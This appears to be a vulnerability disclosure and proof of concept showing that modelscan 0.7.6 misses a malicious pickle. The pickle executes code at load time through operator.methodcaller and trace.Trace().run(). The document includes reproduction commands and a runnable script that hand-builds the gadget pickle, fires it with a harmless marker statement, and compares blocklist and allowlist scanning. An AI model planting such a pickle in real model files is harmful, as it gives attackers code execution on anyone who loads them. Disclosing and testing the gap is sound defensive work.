metadata
license: mit
Modelscan Bypass PoC — trace.Trace().run()
Vulnerability
Modelscan 0.7.6 reports "No issues found" for a pickle file that reaches arbitrary code execution through trace.Trace().run().
The trace module is not in modelscan's unsafe_globals blocklist, so neither the import nor the call is flagged. trace.Trace.run(stmt) delegates to trace.Trace.runctx(), which ends in a plain exec() of the statement with __main__'s namespace as globals, so any Python statement string embedded in the pickle runs at load time.
Chain
1. operator.methodcaller('run', '<malicious_code>'): not blocked (only operator.attrgetter is on the blocklist)
2. trace.Trace(): not blocked (the trace module is absent from the blocklist)
3. methodcaller(trace_instance) calls trace_instance.run(stmt), which ends in exec(stmt, __main__.__dict__, __main__.__dict__)
Reproduction
modelscan scan -p pytorch_model.bin
# Result: "No issues found"
python3 -c "import pickle; pickle.loads(open('pytorch_model.bin','rb').read())"
# Result: Arbitrary code execution
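The chain from the Chain section and the two reproduction steps above, as one runnable example. This is added code, not part of the PoC repository and not modelscan's code: it hand-assembles the pickle opcode by opcode, loads it with a harmless marker statement in place of <malicious_code>, and contrasts an illustrative blocklist scanner (a made-up table that, like the report describes, knows attrgetter but not methodcaller or trace; it is not modelscan's real unsafe_globals list) with an allowlist scanner. The allowlist entries for a bare PyTorch state_dict are an assumption for this example. The Trace constructor is called with two positional zeros (count=0, trace=0) only so the line tracer does not print during the demo; the page's trace.Trace() with defaults reaches the same exec().

```python
"""Build the methodcaller -> trace.Trace().run() pickle, detonate it with a
harmless statement, and show why a blocklist scanner misses it while an
allowlist scanner does not.  Added example; not modelscan's code."""
import builtins
import pickle
import pickletools
import struct

# Harmless stand-in for '<malicious_code>': it only sets a marker attribute.
BENIGN_STMT = "import builtins; builtins.MODELSCAN_POC_MARKER = 'executed'"


def _binunicode(s: str) -> bytes:
    """Protocol-2 BINUNICODE opcode: 'X' + little-endian u32 length + UTF-8."""
    raw = s.encode("utf-8")
    return pickle.BINUNICODE + struct.pack("<I", len(raw)) + raw


def build_poc(stmt: str = BENIGN_STMT) -> bytes:
    """Assemble the gadget chain by hand; the unpickler stack is shown per step."""
    return b"".join([
        pickle.PROTO + b"\x02",
        # operator.methodcaller('run', stmt)                       -> [mc]
        pickle.GLOBAL + b"operator\nmethodcaller\n",
        pickle.MARK, _binunicode("run"), _binunicode(stmt), pickle.TUPLE,
        pickle.REDUCE,
        # trace.Trace(0, 0)                                         -> [mc, tr]
        # The page's chain uses trace.Trace() with default arguments; the two
        # zeros (count=0, trace=0) only silence the line tracer for this demo.
        pickle.GLOBAL + b"trace\nTrace\n",
        pickle.MARK, pickle.BININT1 + b"\x00", pickle.BININT1 + b"\x00",
        pickle.TUPLE, pickle.REDUCE,
        # mc(tr) == tr.run(stmt) == exec(stmt, __main__.__dict__, ...)  -> [None]
        pickle.TUPLE1,
        pickle.REDUCE,
        pickle.STOP,
    ])


def detonate(data: bytes):
    """pickle.loads() the bytes exactly as torch.load(weights_only=False) would,
    then return the marker the benign statement leaves on builtins."""
    pickle.loads(data)
    return getattr(builtins, "MODELSCAN_POC_MARKER", None)


_STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
               "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def referenced_globals(data: bytes):
    """Every (module, name) the pickle imports, found statically via pickletools.

    Handles GLOBAL (module/name inline, space-separated by pickletools) and
    protocol-4 STACK_GLOBAL (module and name are the two preceding strings).
    """
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            found.append((strings[-2], strings[-1]))
        elif op.name in _STRING_OPS:
            strings.append(arg)
    return found


# Illustrative "known bad" table, NOT modelscan's real unsafe_globals list:
# it blocks attrgetter but not methodcaller, and never heard of trace.
ILLUSTRATIVE_BLOCKLIST = {
    ("builtins", "eval"), ("builtins", "exec"), ("os", "system"),
    ("subprocess", "Popen"), ("operator", "attrgetter"),
}

# Assumed minimal allowlist for a plain PyTorch state_dict pickle.
STATE_DICT_ALLOWLIST = {
    ("collections", "OrderedDict"),
    ("torch", "FloatStorage"),
    ("torch._utils", "_rebuild_tensor_v2"),
}


def blocklist_hits(data: bytes):
    """What a blocklist scanner reports for this file: nothing."""
    return [g for g in referenced_globals(data) if g in ILLUSTRATIVE_BLOCKLIST]


def allowlist_violations(data: bytes):
    """What an allowlist scanner reports: both gadget imports."""
    return [g for g in referenced_globals(data) if g not in STATE_DICT_ALLOWLIST]


if __name__ == "__main__":
    poc = build_poc()
    print("blocklist :", blocklist_hits(poc))
    print("allowlist :", allowlist_violations(poc))
    print("detonated :", detonate(poc))
```

The static pass never calls pickle.loads(), so it is safe to run on untrusted files; only detonate() executes the payload, and only the benign marker statement is embedded here. The point of the allowlist function is that no entry had to know about operator.methodcaller or trace to catch them.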
Impact
Full RCE on any system that loads this file with pickle.loads() or with torch.load() using weights_only=False (the default before PyTorch 2.6). From PyTorch 2.6 the default weights_only=True unpickler only admits an allowlist of globals, so the file fails to load instead of executing; a scanner that passes it still leaves anyone on the older default, or anyone who opts out, exposed.
Modelscan Version
0.7.6 (latest as of 2026-04-05)